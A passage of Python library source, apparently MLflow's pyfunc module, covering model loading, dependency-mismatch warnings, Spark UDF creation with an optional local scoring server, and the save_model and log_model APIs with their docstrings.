and self._model_meta.artifact_path is not None
):
info["artifact_path"] = self._model_meta.artifact_path
info["flavor"] = self._model_meta.flavors[FLAVOR_NAME]["loader_module"]
return yaml.safe_dump({"mlflow.pyfunc.loaded_model": info}, default_flow_style=False)
def _warn_dependency_requirement_mismatches(model_path):
"""
Inspects the model's dependencies and prints a warning if the current Python environment
doesn't satisfy them.
"""
req_file_path = os.path.join(model_path, _REQUIREMENTS_FILE_NAME)
if not os.path.exists(req_file_path):
return
try:
mismatch_infos = []
for req in _parse_requirements(req_file_path, is_constraint=False):
req_line = req.req_str
mismatch_info = _check_requirement_satisfied(req_line)
if mismatch_info is not None:
mismatch_infos.append(str(mismatch_info))
if len(mismatch_infos) > 0:
mismatch_str = " - " + "\n - ".join(mismatch_infos)
warning_msg = (
"Detected one or more mismatches between the model's dependencies and the current "
f"Python environment:\n{mismatch_str}\n"
"To fix the mismatches, call `mlflow.pyfunc.get_model_dependencies(model_uri)` "
"to fetch the model's environment and install dependencies using the resulting "
"environment file."
)
_logger.warning(warning_msg)
except Exception as e:
_logger.warning(
f"Encountered an unexpected error ({repr(e)}) while detecting model dependency "
"mismatches. Set logging level to DEBUG to see the full traceback."
)
_logger.debug("", exc_info=True)
def load_model(
model_uri: str, suppress_warnings: bool = False, dst_path: str = None
) -> PyFuncModel:
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
:param dst_path: The local filesystem path to which to download the model artifact.
This directory must already exist. If unspecified, a local output
path will be created.
"""
local_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
if not suppress_warnings:
_warn_dependency_requirement_mismatches(local_path)
model_meta = Model.load(os.path.join(local_path, MLMODEL_FILE_NAME))
conf = model_meta.flavors.get(FLAVOR_NAME)
if conf is None:
raise MlflowException(
'Model does not have the "{flavor_name}" flavor'.format(flavor_name=FLAVOR_NAME),
RESOURCE_DOES_NOT_EXIST,
)
model_py_version = conf.get(PY_VERSION)
if not suppress_warnings:
_warn_potentially_incompatible_py_version_if_necessary(model_py_version=model_py_version)
_add_code_from_conf_to_system_path(local_path, conf, code_key=CODE)
data_path = os.path.join(local_path, conf[DATA]) if (DATA in conf) else local_path
model_impl = importlib.import_module(conf[MAIN])._load_pyfunc(data_path)
return PyFuncModel(model_meta=model_meta, model_impl=model_impl)
def _download_model_conda_env(model_uri):
conda_yml_file_name = _get_flavor_configuration_from_uri(model_uri, FLAVOR_NAME)[ENV]
return _download_artifact_from_uri(append_to_uri_path(model_uri, conda_yml_file_name))
def _get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
if format == "pip":
req_file_uri = append_to_uri_path(model_uri, _REQUIREMENTS_FILE_NAME)
try:
return _download_artifact_from_uri(req_file_uri)
except Exception as e:
# fallback to download conda.yaml file and parse the "pip" section from it.
_logger.info(
f"Downloading model '{_REQUIREMENTS_FILE_NAME}' file failed, error is {repr(e)}. "
"Falling back to fetching pip requirements from the model's 'conda.yaml' file. "
"Other conda dependencies will be ignored."
)
conda_yml_path = _download_model_conda_env(model_uri)
with open(conda_yml_path, "r") as yf:
conda_yml = yaml.safe_load(yf)
conda_deps = conda_yml.get("dependencies", [])
for index, dep in enumerate(conda_deps):
if isinstance(dep, dict) and "pip" in dep:
pip_deps_index = index
break
else:
raise MlflowException(
"No pip section found in conda.yaml file in the model directory.",
error_code=RESOURCE_DOES_NOT_EXIST,
)
pip_deps = conda_deps.pop(pip_deps_index)["pip"]
tmp_dir = tempfile.mkdtemp()
pip_file_path = os.path.join(tmp_dir, _REQUIREMENTS_FILE_NAME)
with open(pip_file_path, "w") as f:
f.write("\n".join(pip_deps) + "\n")
if len(conda_deps) > 0:
_logger.warning(
"The following conda dependencies have been excluded from the environment file:"
f" {', '.join(conda_deps)}."
)
return pip_file_path
elif format == "conda":
conda_yml_path = _download_model_conda_env(model_uri)
return conda_yml_path
else:
raise MlflowException(
f"Illegal format argument '{format}'.", error_code=INVALID_PARAMETER_VALUE
)
def get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
"""
:param model_uri: The uri of the model to get dependencies from.
:param format: The format of the returned dependency file. If the ``"pip"`` format is
specified, the path to a pip ``requirements.txt`` file is returned.
If the ``"conda"`` format is specified, the path to a ``"conda.yaml"``
file is returned . If the ``"pip"`` format is specified but the model
was not saved with a ``requirements.txt`` file, the ``pip`` section
of the model's ``conda.yaml`` file is extracted instead, and any
additional conda dependencies are ignored. Default value is ``"pip"``.
:return: The local filesystem path to either a pip ``requirements.txt`` file
(if ``format="pip"``) or a ``conda.yaml`` file (if ``format="conda"``)
specifying the model's dependencies.
"""
dep_file = _get_model_dependencies(model_uri, format)
if format == "pip":
prefix = "%" if is_in_databricks_runtime() else ""
_logger.info(
"To install these model dependencies, run the "
f"following command: '{prefix}pip install -r {dep_file}'."
)
return dep_file
@deprecated("mlflow.pyfunc.load_model", 1.0)
def load_pyfunc(model_uri, suppress_warnings=False):
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
"""
return load_model(model_uri, suppress_warnings)
def _warn_potentially_incompatible_py_version_if_necessary(model_py_version=None):
"""
Compares the version of Python that was used to save a given model with the version
of Python that is currently running. If a major or minor version difference is detected,
logs an appropriate warning.
"""
if model_py_version is None:
_logger.warning(
"The specified model does not have a specified Python version. It may be"
" incompatible with the version of Python that is currently running: Python %s",
PYTHON_VERSION,
)
elif get_major_minor_py_version(model_py_version) != get_major_minor_py_version(PYTHON_VERSION):
_logger.warning(
"The version of Python that the model was saved in, `Python %s`, differs"
" from the version of Python that is currently running, `Python %s`,"
" and may be incompatible",
model_py_version,
PYTHON_VERSION,
)
def _get_or_create_model_cache_dir():
nfs_root_dir = get_nfs_cache_root_dir()
if nfs_root_dir is not None:
# In databricks, the '/local_disk0/.ephemeral_nfs' is mounted as NFS disk
# the data stored in the disk is shared with all remote nodes.
root_dir = os.path.join(nfs_root_dir, "models")
os.makedirs(root_dir, exist_ok=True)
tmp_model_dir = tempfile.mkdtemp(dir=root_dir)
# TODO: register deleting tmp_model_dir handler when exit
else:
import atexit
import shutil
tmp_model_dir = tempfile.mkdtemp()
atexit.register(shutil.rmtree, tmp_model_dir, ignore_errors=True)
return tmp_model_dir
_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP = 200
def spark_udf(spark, model_uri, result_type="double", env_manager="local"):
"""
A Spark UDF that can be used to invoke the Python function formatted model.
Parameters passed to the UDF are forwarded to the model as a DataFrame where the column names
are ordinals (0, 1, ...). On some versions of Spark (3.0 and above), it is also possible to
wrap the input in a struct. In that case, the data will be passed as a DataFrame with column
names given by the struct definition (e.g. when invoked as my_udf(struct('x', 'y')), the model
will get the data as a pandas DataFrame with 2 columns 'x' and 'y').
If a model contains a signature, the UDF can be called without specifying column name
arguments. In this case, the UDF will be called with column names from signature, so the
evaluation dataframe's column names must match the model signature's column names.
The predictions are filtered to contain only the columns that can be represented as the
``result_type``. If the ``result_type`` is string or array of strings, all predictions are
converted to string. If the result type is not an array type, the left most column with
matching type is returned.
NOTE: Inputs of type ``pyspark.sql.types.DateType`` are not supported on earlier versions of
Spark (2.4 and below).
.. code-block:: python
:caption: Example
from pyspark.sql.functions import struct
predict = mlflow.pyfunc.spark_udf(spark, "/my/local/model")
df.withColumn("prediction", predict(struct("name", "age"))).show()
:param spark: A SparkSession object.
:param model_uri: The location, in URI format, of the MLflow model with the
:py:mod:`mlflow.pyfunc` flavor. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param result_type: the return type of the user-defined function. The value can be either a
``pyspark.sql.types.DataType`` object or a DDL-formatted type string. Only a primitive
type or an array ``pyspark.sql.types.ArrayType`` of primitive type are allowed.
The following classes of result type are supported:
- "int" or ``pyspark.sql.types.IntegerType``: The leftmost integer that can fit in an
``int32`` or an exception if there is none.
- "long" or ``pyspark.sql.types.LongType``: The leftmost long integer that can fit in an
``int64`` or an exception if there is none.
- ``ArrayType(IntegerType|LongType)``: All integer columns that can fit into the requested
size.
- "float" or ``pyspark.sql.types.FloatType``: The leftmost numeric result cast to
``float32`` or an exception if there is none.
- "double" or ``pyspark.sql.types.DoubleType``: The leftmost numeric result cast to
``double`` or an exception if there is none.
- ``ArrayType(FloatType|DoubleType)``: All numeric columns cast to the requested type or
an exception if there are no numeric columns.
- "string" or ``pyspark.sql.types.StringType``: The leftmost column converted to ``string``.
- ``ArrayType(StringType)``: All columns converted to ``string``.
:param env_manager: The environment manager to use in order to create the
software environment for model inference. Default value is ``local``,
The following values are supported:
- ``conda``: (Recommended) Use Conda to restore the software environment
that was used to train the model. Note that environment is only restored
in the context of the PySpark UDF; the software environment outside of
the UDF is unaffected.
- ``local``: Use the current Python environment for model inference, which
may differ from the environment used to train the model and may lead to
errors or invalid predictions.
:return: Spark UDF that applies the model's ``predict`` method to the data and returns a
type specified by ``result_type``, which by default is a double.
"""
# Scope Spark import to this method so users don't need pyspark to use non-Spark-related
# functionality.
import functools
from mlflow.pyfunc.spark_model_cache import SparkModelCache
from mlflow.utils._spark_utils import _SparkDirectoryDistributor
from pyspark.sql.functions import pandas_udf
from pyspark.sql.types import _parse_datatype_string
from pyspark.sql.types import (
ArrayType,
DataType as SparkDataType,
StructType as SparkStructType,
)
from pyspark.sql.types import DoubleType, IntegerType, FloatType, LongType, StringType
from mlflow.models.cli import _get_flavor_backend
env_manager = _EnvManager.from_string(env_manager)
# Check whether spark is in local or local-cluster mode
# this case all executors and driver share the same filesystem
is_spark_in_local_mode = spark.conf.get("spark.master").startswith("local")
# TODO:
# change `should_use_nfs` to be get_nfs_cache_root_dir() is not None
# when NFS optimization added.
should_use_nfs = False
should_use_spark_to_broadcast_file = not (is_spark_in_local_mode or should_use_nfs)
if not isinstance(result_type, SparkDataType):
result_type = _parse_datatype_string(result_type)
elem_type = result_type
if isinstance(elem_type, ArrayType):
elem_type = elem_type.elementType
supported_types = [IntegerType, LongType, FloatType, DoubleType, StringType]
if not any([isinstance(elem_type, x) for x in supported_types]):
raise MlflowException(
message="Invalid result_type '{}'. Result type can only be one of or an array of one "
"of the following types: {}".format(str(elem_type), str(supported_types)),
error_code=INVALID_PARAMETER_VALUE,
)
local_model_path = _download_artifact_from_uri(
artifact_uri=model_uri, output_path=_get_or_create_model_cache_dir()
)
if env_manager is _EnvManager.LOCAL:
# Assume spark executor python environment is the same with spark driver side.
_warn_dependency_requirement_mismatches(local_model_path)
_logger.warning(
'Calling `spark_udf()` with `env_manager="local"` does not recreate the same '
"environment that was used during training, which may lead to errors or inaccurate "
'predictions. We recommend specifying `env_manager="conda"`, which automatically '
"recreates the environment that was used to train the model and performs inference "
"in the recreated environment."
)
else:
_logger.info(
"This UDF will use Conda to recreate the model's software environment for inference. "
"This may take extra time during execution."
)
if not sys.platform.startswith("linux"):
# TODO: support killing mlflow server launched in UDF task when spark job canceled
# for non-linux system.
# https://stackoverflow.com/questions/53208/how-do-i-automatically-destroy-child-processes-in-windows
_logger.warning(
"In order to run inference code in restored python environment, PySpark UDF "
"processes spawn MLflow Model servers as child processes. Due to system "
"limitations with handling SIGKILL signals, these MLflow Model server child "
"processes cannot be cleaned up if the Spark Job is canceled."
)
if not should_use_spark_to_broadcast_file:
# Prepare restored environment in driver side if possible.
if env_manager is _EnvManager.CONDA:
_get_flavor_backend(
local_model_path, env_manager=_EnvManager.CONDA, install_mlflow=False
).prepare_env(model_uri=local_model_path, capture_output=False)
# Broadcast local model directory to remote worker if needed.
if should_use_spark_to_broadcast_file:
archive_path = SparkModelCache.add_local_model(spark, local_model_path)
model_metadata = Model.load(os.path.join(local_model_path, MLMODEL_FILE_NAME))
def _predict_row_batch(predict_fn, args):
input_schema = model_metadata.get_input_schema()
pdf = None
for x in args:
if type(x) == pandas.DataFrame:
if len(args) != 1:
raise Exception(
"If passing a StructType column, there should be only one "
"input column, but got %d" % len(args)
)
pdf = x
if pdf is None:
args = list(args)
if input_schema is None:
names = [str(i) for i in range(len(args))]
else:
names = input_schema.input_names()
if len(args) > len(names):
args = args[: len(names)]
if len(args) < len(names):
raise MlflowException(
"Model input is missing columns. Expected {0} input columns {1},"
" but the model received only {2} unnamed input columns"
" (Since the columns were passed unnamed they are expected to be in"
" the order specified by the schema).".format(len(names), names, len(args))
)
pdf = pandas.DataFrame(data={names[i]: x for i, x in enumerate(args)}, columns=names)
result = predict_fn(pdf)
if not isinstance(result, pandas.DataFrame):
result = pandas.DataFrame(data=result)
elem_type = result_type.elementType if isinstance(result_type, ArrayType) else result_type
if type(elem_type) == IntegerType:
result = result.select_dtypes(
[np.byte, np.ubyte, np.short, np.ushort, np.int32]
).astype(np.int32)
elif type(elem_type) == LongType:
result = result.select_dtypes([np.byte, np.ubyte, np.short, np.ushort, int])
elif type(elem_type) == FloatType:
result = result.select_dtypes(include=(np.number,)).astype(np.float32)
elif type(elem_type) == DoubleType:
result = result.select_dtypes(include=(np.number,)).astype(np.float64)
if len(result.columns) == 0:
raise MlflowException(
message="The the model did not produce any values compatible with the requested "
"type '{}'. Consider requesting udf with StringType or "
"Arraytype(StringType).".format(str(elem_type)),
error_code=INVALID_PARAMETER_VALUE,
)
if type(elem_type) == StringType:
result = result.applymap(str)
if type(result_type) == ArrayType:
return pandas.Series(result.to_numpy().tolist())
else:
return result[result.columns[0]]
result_type_hint = (
pandas.DataFrame if isinstance(result_type, SparkStructType) else pandas.Series
)
@pandas_udf(result_type)
def udf(
iterator: Iterator[Tuple[Union[pandas.Series, pandas.DataFrame], ...]]
) -> Iterator[result_type_hint]:
# importing here to prevent circular import
from mlflow.pyfunc.scoring_server.client import ScoringServerClient
# Note: this is a pandas udf function in iteration style, which takes an iterator of
# tuple of pandas.Series and outputs an iterator of pandas.Series.
scoring_server_proc = None
# TODO: Support virtual env.
#
# TODO: For conda/virtualenv restored env cases,
# For each individual python process (driver side), create individual and temporary
# conda env dir / virtualenv env dir and when process exit,
# delete the temporary env dir.
# The reason is
# 1. env dir might be a large size directory and cleaning it when process exit
# help saving disk space.
# 2. We have conda package cache dir and pip cache dir which are shared across all
# python processes which help reducing downloading time.
# 3. Avoid race conditions related issues.
#
# TODO:
# For NFS available case, set conda env dir / virtualenv env dir in sub-directory under
# NFS directory, and in spark driver side prepare restored env once, and then all
# spark UDF tasks running on spark workers can skip re-creating the restored env.
if env_manager is _EnvManager.CONDA:
server_port = find_free_port()
if should_use_spark_to_broadcast_file:
local_model_path_on_executor = _SparkDirectoryDistributor.get_or_extract(
archive_path
)
# Call "prepare_env" in advance in order to reduce scoring server launch time.
# So that we can use a shorter timeout when call `client.wait_server_ready`,
# otherwise we have to set a long timeout for `client.wait_server_ready` time,
# this prevents spark UDF task failing fast if other exception raised when scoring
# server launching.
_get_flavor_backend(
local_model_path_on_executor,
env_manager=_EnvManager.CONDA,
install_mlflow=False,
).prepare_env(model_uri=local_model_path_on_executor, capture_output=True)
else:
local_model_path_on_executor = local_model_path
# launch scoring server
# TODO: adjust timeout for server requests handler.
scoring_server_proc = _get_flavor_backend(
local_model_path_on_executor,
env_manager=_EnvManager.CONDA,
workers=1,
install_mlflow=False,
).serve(
model_uri=local_model_path_on_executor,
port=server_port,
host="127.0.0.1",
enable_mlserver=False,
synchronous=False,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
server_tail_logs = collections.deque(maxlen=_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP)
def server_redirect_log_thread_func(child_stdout):
for line in child_stdout:
if isinstance(line, bytes):
decoded = line.decode()
else:
decoded = line
server_tail_logs.append(decoded)
sys.stdout.write("[model server] " + decoded)
server_redirect_log_thread = threading.Thread(
target=server_redirect_log_thread_func, args=(scoring_server_proc.stdout,)
)
server_redirect_log_thread.setDaemon(True)
server_redirect_log_thread.start()
client = ScoringServerClient("127.0.0.1", server_port)
try:
client.wait_server_ready(timeout=90, scoring_server_proc=scoring_server_proc)
except Exception:
err_msg = "During spark UDF task execution, mlflow model server failed to launch. "
if len(server_tail_logs) == _MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP:
err_msg += (
f"Last {_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP} "
"lines of MLflow model server output:\n"
)
else:
err_msg += "MLflow model server output:\n"
err_msg += "".join(server_tail_logs)
raise MlflowException(err_msg)
def batch_predict_fn(pdf):
return client.invoke(pdf)
elif env_manager is _EnvManager.LOCAL:
if should_use_spark_to_broadcast_file:
loaded_model, _ = SparkModelCache.get_or_load(archive_path)
else:
loaded_model = mlflow.pyfunc.load_model(local_model_path)
def batch_predict_fn(pdf):
return loaded_model.predict(pdf)
try:
for input_batch in iterator:
# If the UDF is called with only multiple arguments,
# the `input_batch` is a tuple which composes of several pd.Series/pd.DataFrame
# objects.
# If the UDF is called with only one argument,
# the `input_batch` instance will be an instance of `pd.Series`/`pd.DataFrame`,
if isinstance(input_batch, (pandas.Series, pandas.DataFrame)):
# UDF is called with only one argument
row_batch_args = (input_batch,)
else:
row_batch_args = input_batch
yield _predict_row_batch(batch_predict_fn, row_batch_args)
finally:
if scoring_server_proc is not None:
os.kill(scoring_server_proc.pid, signal.SIGTERM)
udf.metadata = model_metadata
@functools.wraps(udf)
def udf_with_default_cols(*args):
if len(args) == 0:
input_schema = model_metadata.get_input_schema()
if input_schema and len(input_schema.inputs) > 0:
if input_schema.has_input_names():
input_names = input_schema.input_names()
return udf(*input_names)
else:
raise MlflowException(
message="Cannot apply udf because no column names specified. The udf "
"expects {} columns with types: {}. Input column names could not be "
"inferred from the model signature (column names not found).".format(
len(input_schema.inputs),
input_schema.inputs,
),
error_code=INVALID_PARAMETER_VALUE,
)
else:
raise MlflowException(
"Attempting to apply udf on zero columns because no column names were "
"specified as arguments or inferred from the model signature.",
error_code=INVALID_PARAMETER_VALUE,
)
else:
return udf(*args)
return udf_with_default_cols
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def save_model(
path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
mlflow_model=None,
python_model=None,
artifacts=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
pip_requirements=None,
extra_pip_requirements=None,
**kwargs,
):
"""
save_model(path, loader_module=None, data_path=None, code_path=None, conda_env=None,\
mlflow_model=Model(), python_model=None, artifacts=None)
Save a Pyfunc model with custom inference logic and optional data dependencies to a path on the
local filesystem.
For information about the workflows that this method supports, please see :ref:`"workflows for
creating custom pyfunc models" <pyfunc-create-custom-workflows>` and
:ref:`"which workflow is right for my use case?" <pyfunc-create-custom-selecting-workflow>`.
Note that the parameters for the second workflow: ``loader_module``, ``data_path`` and the
parameters for the first workflow: ``python_model``, ``artifacts``, cannot be
specified together.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param mlflow_model: :py:mod:`mlflow.models.Model` configuration to which to add the
**python_function** flavor.
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame where the given
example will be serialized to json using the Pandas split-oriented
format, or a numpy array where the example will be serialized to json
by converting it to a list. Bytes are base64-encoded.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
"""
_validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)
mlflow_model = kwargs.pop("model", mlflow_model)
if len(kwargs) > 0:
raise TypeError("save_model() got unexpected keyword arguments: {}".format(kwargs))
if code_path is not None:
if not isinstance(code_path, list):
raise TypeError("Argument code_path should be a list, not {}".format(type(code_path)))
first_argument_set = {
"loader_module": loader_module,
"data_path": data_path,
}
second_argument_set = {
"artifacts": artifacts,
"python_model": python_model,
}
first_argument_set_specified = any([item is not None for item in first_argument_set.values()])
second_argument_set_specified = any([item is not None for item in second_argument_set.values()])
if first_argument_set_specified and second_argument_set_specified:
raise MlflowException(
message=(
"The following sets of parameters cannot be specified together: {first_set_keys}"
" and {second_set_keys}. All parameters in one set must be `None`. Instead, found"
" the following values: {first_set_entries} and {second_set_entries}".format(
first_set_keys=first_argument_set.keys(),
second_set_keys=second_argument_set.keys(),
first_set_entries=first_argument_set,
second_set_entries=second_argument_set,
)
),
error_code=INVALID_PARAMETER_VALUE,
)
elif (loader_module is None) and (python_model is None):
msg = (
"Either `loader_module` or `python_model` must be specified. A `loader_module` "
"should be a python module. A `python_model` should be a subclass of PythonModel"
)
raise MlflowException(message=msg, error_code=INVALID_PARAMETER_VALUE)
_validate_and_prepare_target_save_path(path)
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
if first_argument_set_specified:
return _save_model_with_loader_module_and_data_path(
path=path,
loader_module=loader_module,
data_path=data_path,
code_paths=code_path,
conda_env=conda_env,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
elif second_argument_set_specified:
return mlflow.pyfunc.model._save_model_with_class_artifacts_params(
path=path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
code_paths=code_path,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def log_model(
artifact_path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
python_model=None,
artifacts=None,
registered_model_name=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Log a Pyfunc model with custom inference logic and optional data dependencies as an MLflow
artifact for the current run.
For information about the workflows that this method supports, see :ref:`Workflows for
creating custom pyfunc models <pyfunc-create-custom-workflows>` and
:ref:`Which workflow is right for my use case? <pyfunc-create-custom-selecting-workflow>`.
You cannot specify the parameters for the second workflow: ``loader_module``, ``data_path``
and the parameters for the first workflow: ``python_model``, ``artifacts`` together.
:param artifact_path: The run-relative artifact path to which to log the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param registered_model_name: This argument may change or be removed in a
future release without warning. If given, create a model
version under ``registered_model_name``, also creating a
registered model if one with the given name does not exist.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame where the given
example will be serialized to json using the Pandas split-oriented
format, or a numpy array where the example will be serialized to json
by converting it to a list. Bytes are base64-encoded.
:param await_registration_for: Number of seconds to wait for the model version to finish
being created and is in ``READY`` status. By default, the function
waits for five minutes. Specify 0 or None to skip waiting.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
metadata of the logged model.
"""
return Model.log(
artifact_path=artifact_path,
flavor=mlflow.pyfunc,
loader_module=loader_module,
data_path=data_path,
code_path=code_path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
registered_model_name=registered_model_name,
signature=signature,
input_example=input_example,
await_registration_for=await_registration_for,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
def _save_model_with_loader_module_and_data_path(
path,
loader_module,
data_path=None,
code_paths=None,
conda_env=None,
mlflow_model=None,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Export model as a generic Python function model.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``.
:param data_path: Path to a file or directory containing model data.
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: Either a dictionary representation of a Conda environment or the path to a
Conda environment yaml file. If provided, this decsribes the environment
this model should be run in.
:return: Model configuration containing model info.
"""
data = None
if data_path is not None:
model_file = _copy_file_or_tree(src=data_path, dst=path, dst_dir="data")
data = model_file
code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)
if mlflow_model is None:
mlflow_model = Model()
mlflow.pyfunc.add_to_model(
mlflow_model,
loader_module=loader_module,
code=code_dir_subpath,
data=data,
env=_CONDA_ENV_FILE_NAME,
)
mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))
if conda_env is None:
if pip_requirements is None:
default_reqs = get_default_pip_requirements()
# To ensure `_load_pyfunc` can successfully load the model during the dependency
# inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
inferred_reqs = mlflow.models.infer_pip_requirements(
path,
FLAVOR_NAME,
fallback=default_reqs,
)
